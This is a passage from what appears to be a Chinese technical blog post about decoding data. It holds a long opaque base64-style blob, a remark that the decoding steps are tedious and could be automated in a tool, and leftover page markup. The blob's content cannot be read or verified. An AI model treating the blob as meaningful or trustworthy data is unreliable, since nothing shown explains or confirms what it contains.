Q/rtxUsVpGWcIjI8gCnJceg9hv9scjm0uwr48X3rueW6JRbf333rKhavf4Sa2gabyz6cevbz0RMa7Ien58DniIkM4q6bV7L8ymkIgoDRODTRPD4YQrxV6F1VgERimAqdE7hqoaZHOncdbPmpE4dyJB7dZH+x2haCvSHcV4Vssf0I84FHN2qobZLYcdKIsXO4H6uyD2SPPVDa7g5GnpEYV20hMjyQ2jrbQhOGBvsRHRGkOP1wxkMHDhxcvtgkmouiRF1DI+5urpSWV5FfVM6SBdNx0TkjSZKFODQUBGC8TuJQ8+D5jAsIYHlSouwBKkkczC9gb27esM5tK1dNTEIF7MjKxtBDGFSr5IdStcK66J2Pj6sr16ZOBaDDaCS3ohIXrRORfn7Drt/B2JWdTW5lJZIkUd/SatNvtx4/ycHcfGbFRrN8YtKInssWuoQvACdBPWC60bKnN6lRkbhptfzm462jds6RZqDr4puG1o7xIRpa2yipq0PvoiPEywsntZqb58yySTT/zqwZZsG8rqUFL1dX3J2duWn2LH47zIm0y6EfjtU12JsbZs7ASa3GYDKRX1lFlJ8vWo2G78yaaRbNV0+eZBa6jaJIdmkZAR4eqAXbhD1b8rlx1gyzYG5P6k2+lHZEE6LNtZr27XcERBEmJYsEBEBrqyzUarVw7pxA1lmYPWtwMXnGdMjOhiNHICkJEsZbHm9pgepqOV/pMnU0z8kDV3eBwdcvjTxtrRAZDcuWi3joITNTICMD0vcKrFgu27Y7TWDvXggLG9h7/FQm7N8Pc+dA0kSR05kCGfvB3w+mTLHdLg8P2LBeFs6bhunFt3ef8K0M1fPEs//BxWXsHQu+7Tz74nu4uQ2y/GIQDh09x6Gj51g0bzJTkuPsYs/l0O4rl0znluuW0NTcyjMvvUf2+SLGxYZy4/pFGE2ySGpr2YdTz0r40X0bmD8zidq6Jry97H8f7I1akO9BTgO/NnzjuX6uBhWw5aBoIVCPVdkHssfBt4uRGFcvN0Z6PHTgwMHYoPh1ZP+R0/zr3c9o75CXzXt6uOOkEfhqz2G+2nMYZ2ct16xcwIpFs4ZlUJyzyKHmwcWHG6ZPJcav21tjYmiIWegAqGhs4nxFxbDsGAwfV1dmx0TTajCw+7wspAS5ubIiOhJNp+ARrvfg9olyyJLy5lY+zy9QlE+4j49ZHN9+OsscqiLcx5swb2/zb50EgfWpU5keFUWA3oO6llayS0t5+8BB6lvbAHB31vLL1asQVCpOXyohyteX2AB/jKLIZycz+ej4Ca6eMpnZnWERAERJIru0lKb27nAEixMTWJQ4ngAPD1yctDS2t1FYXcOmg4cpqK6msqmJyqYmQjw9B603Jed6aNmSPl7rXTy7bTs1LS1W7ZkeHcWGaVPwcnU1//Z7C+dR39qKKEn8fus2mjs6FNmjEQQ2pE5lRnQU/h4eVDY2cfTiRd4/dARDZ9zlx69eg85JQ1l9A37u7oT7+lBe38Cru9PJrbTsh6/tTiertJSfrlhGqLcXiSHBJIUEk1NRyW/WrkYQVOzKPsf201lcnTKZ2XExGE0ij334MeumTmFGTDRuzlo8dDqKa2tp6zAQHxRIeX09z32xgw6jiZ+vWoFKBbkVlcQG+BPs5UVxTS3/TM8w22Ov/tOT/vqz0jbtzfqpU5gREwXA2ZIy3szYb7Xdh2LzQGw9cZLtmWcYHxzItalDdym9799vU9fSYpbXnr52PTH+fuh1OjSCoCh2t16nIyU8HIAThUX88fPtvHbHrbhqtSSFhuDj5kpNc986HIyB+uGZktJh1/Pu7PMkh4UA8OTWbTS1t5vPq3PS8PjV8tLMRz74UNE1aMv1NRCLEsaZJ/QO5xew+ehx8/UF8PWZbHZmZ+PXudLhYF4+L361k9vmzOaqycl4urjgrNFgNJlYNWkiAMW1tTz+0VYa2toQANeB4l70g1qlUpxPQnCQosnIoZLfPkGRaF5aKofwuHhx4PtzVfXgYrJKhdkLuvcmoBuvFfnLCwLnzgusWiniZ8Uhs7hY3nzSwx2KimHSJDkeenY2xMXJHtcgh33ZlyFQXg5GI3h7w9QpIlOnWuaXfQ5OnxYoKAB
|
|||
|
|
<p blockindex=66>虽然分析没问题,但是步骤略微繁琐,后续有空,可以考虑整合成一个工具,自动解码。</p>
|
|||
|
|
</div></div>
|
|||
|
|
</div>
|
|||
|
|
|
|||
|
|
</div>
|
|||
|
|
|
|||
|
|
</div>
|
|||
|
|
|
|||
|
|
|
|||
|
|
</div>
|
|||
|
|
|
|||
|
|
|
|||
|
|
</div>
|
|||
|
|
</div>
|
|||
|
|
</div>
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
|